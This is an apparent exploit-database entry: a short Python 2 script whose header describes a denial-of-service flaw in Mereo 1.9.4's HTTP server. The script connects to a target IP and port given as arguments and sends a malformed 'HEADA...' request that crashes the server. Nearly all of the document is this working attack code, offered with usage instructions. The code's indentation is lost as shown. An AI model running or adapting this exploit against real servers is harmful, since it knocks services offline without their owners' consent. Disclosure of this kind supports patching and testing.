#!/usr/bin/python
'''
# Exploit Title: Mereo 1.9.4 - Remote HTTP Server Denial of Service
# Date: 06-2020
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/mereo/
# Software Link: https://sourceforge.net/projects/mereo/files/
# Version: 1.9.4
# Tested on: Windows 7 , Windows Vista
# Description : Mereo version 1.9.4 is vulnerable against DoS, An attacker can cause application crash with
sending a buffer like GET+One Character or Head+One Character eg. GETA or HEADA , Since the HTTP method is
not supported with the application, so it will be caused to crash.
Usage:
python mereo194_dos.py 1.2.3.4 80
'''
import socket
import os
import sys
if len(sys.argv) != 3:
print "Usage: python mereo194_dos.py targetIP targetPort"
else:
print "[*] Sending evil http request to target"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((sys.argv[1], int(sys.argv[2])))
expl.send("\x48\x45\x41\x44\x41\x41\x41\x41\x41\x41")
expl.close()